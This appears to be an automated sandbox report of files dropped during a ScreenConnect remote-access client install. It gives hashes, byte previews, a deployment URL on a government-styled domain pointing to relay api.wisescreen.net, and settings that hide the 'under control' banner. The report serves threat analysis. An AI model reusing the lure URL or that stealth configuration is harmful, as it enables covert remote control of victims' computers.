                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):50133
                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                        Malicious:false
                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):26722
                                                                                                                        Entropy (8bit):7.7401940386372345
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                        MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                        SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                        SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                        SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                        Malicious:false
                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1970
                                                                                                                        Entropy (8bit):4.690426481732819
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                        MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                        SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                        SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                        SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):563
                                                                                                                        Entropy (8bit):5.0293069247766855
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO/SxvSGSbCD0/vXbAa3xT:2dL9hK6E46YP8gGSa6vH
                                                                                                                        MD5:8975A2DB9D3613CA73F282C2EA33956C
                                                                                                                        SHA1:BEAE1D71A6460461543EF10CDCC92669D752B5B6
                                                                                                                        SHA-256:A5048210BA8443ACF1C25CCDEABE57C16E383E5FEF12480B2135A41C846F6653
                                                                                                                        SHA-512:063014593A0958B0732A256CCBC91E6CAE17CA6E8DA706BCB4E19DF1517D4C7092ABF755249E2C82A56019AB0519FFB1ED8A71E90BE8D2943CB8867F37B87376
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>api.wisescreen.net=185.49.126.73-13%2f11%2f2024%2017%3a18%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):563
                                                                                                                        Entropy (8bit):5.0293069247766855
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO/SxvSGSbCD0/vXbAa3xT:2dL9hK6E46YP8gGSa6vH
                                                                                                                        MD5:8975A2DB9D3613CA73F282C2EA33956C
                                                                                                                        SHA1:BEAE1D71A6460461543EF10CDCC92669D752B5B6
                                                                                                                        SHA-256:A5048210BA8443ACF1C25CCDEABE57C16E383E5FEF12480B2135A41C846F6653
                                                                                                                        SHA-512:063014593A0958B0732A256CCBC91E6CAE17CA6E8DA706BCB4E19DF1517D4C7092ABF755249E2C82A56019AB0519FFB1ED8A71E90BE8D2943CB8867F37B87376
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>api.wisescreen.net=185.49.126.73-13%2f11%2f2024%2017%3a18%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):68096
                                                                                                                        Entropy (8bit):6.06942231395039
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                                                        MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                                                        SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                                                        SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                                                        SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1373
                                                                                                                        Entropy (8bit):5.369201792577388
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                        MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                        SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                        SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                        SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                        Malicious:false
                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):1662
                                                                                                                        Entropy (8bit):5.368796786510097
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                        MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                        SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                        SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                        SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                        Malicious:false
                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
                                                                                                                        File Type:CSV text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):847
                                                                                                                        Entropy (8bit):5.345615485833535
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                        Malicious:false
                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (603), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):14722
                                                                                                                        Entropy (8bit):3.8062975591095487
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:t6BKLDo/dRdzeAO7B10iBBaOy0lzEDo/dRdzeAO7B1irKYu/7LZ8YUkbYDo/dRdQ:E84ia638MruV8PKLEv
                                                                                                                        MD5:7D71DD3851AFF3FB33A7EF8ECD48317F
                                                                                                                        SHA1:6EEA3D74EDF6CF325286F758C16BE4648F399CFD
                                                                                                                        SHA-256:F3BE2AAB4DB66C9707378C3DB5E8EB84189825CAB63662B0FF73150DDB4DA181
                                                                                                                        SHA-512:17A7CD7B2FB5291A7CEC879ABCB884E79BA085A818C87E21897B874D7C689A357FA2ABBBD5B658F7B2B156DB24205F8F53ED0DECBCF33AB081C463C07374CFE9
                                                                                                                        Malicious:false
                                                                                                                        Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.c.l.o.u.d.-.s.s.a.g.o.v...i.c.u./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.a.p.i...w.i.s.e.s.c.r.e.e.n...n.e.t.&.p.=.8.0.4.1.&.s.=.9.2.9.8.e.1.6.8.-.a.0.c.f.-.4.8.8.d.-.9.5.4.c.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):117161
                                                                                                                        Entropy (8bit):5.583971122293747
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:xNIcT51/FXvMVNWfCXq9ym7m2o9HuzhJOvP:gcfiVIpmt8vOvP
                                                                                                                        MD5:FE06C5E9C53AB451368667D3E3B1504B
                                                                                                                        SHA1:7C76334BB2BC0D1E444A1FCAA484B642572CAD1E
                                                                                                                        SHA-256:89EB055F32184DFE333494A271ED865958D5ADC1521043C6D81098F541CC0B3F
                                                                                                                        SHA-512:B0C6570F937582B1072491506992AD077BD271B7301C26624A9418BAF77BBE5496D30EF3522D63D60EF8BEECC2CA113788B4A91833B99D931C841BAC0D051CAA
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):197120
                                                                                                                        Entropy (8bit):6.586775768189165
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                                                        MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                                                        SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                                                        SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                                                        SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1039
                                                                                                                        Entropy (8bit):5.151589954158412
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:JdFYZ8h9onRigeP0AQ6vSkcyMQgcVSkTo:3FYZ8h9oYgI0AQWHMQgGTo
                                                                                                                        MD5:618DC5F6C85A2057BC7A86C5F498E2F1
                                                                                                                        SHA1:5073B2C3A117985E8F26ED5BEA8C93A5BB202EEA
                                                                                                                        SHA-256:F1BF5014656D836A4C5C42E7ED67FF368D1706C41082E1E4F33ABF9CDA09D647
                                                                                                                        SHA-512:A8ED838573EF9A4119A4D32335543EA5074250D47212068EF2C4B470A451EB0154BCEB8B3BF8B0722D4250122F6B5A196383576F715FD938D3CCB6CBDE7C2799
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):68096
                                                                                                                        Entropy (8bit):6.06942231395039
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                                                        MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                                                        SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                                                        SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                                                        SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1632
